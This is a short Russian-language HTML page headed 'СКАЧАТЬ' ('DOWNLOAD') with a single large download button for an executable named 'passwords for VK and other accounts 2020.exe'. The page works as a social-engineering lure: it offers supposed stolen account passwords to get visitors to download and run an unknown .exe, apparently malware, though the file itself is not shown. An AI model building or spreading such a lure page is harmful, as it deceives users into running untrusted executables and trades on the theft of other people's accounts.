<html>
<head>
    <title>СКАЧАТЬ</title>
</head>
    <body style="background: yellow;">
        <br />
        <br />
        <br />
        <center>
            <h1>СКАЧАТЬ</h1>
            <br />
            <br />
            <br />
            <a href="пароли от вк и других аккаунтов 2020.exe" download=""> 
            <button style="color: red; height: 100px; width: 200px;">СКАЧАТЬ</button>
            </a>
            <br />
            <br />
            <br />
        </center>

    </body>
</html>
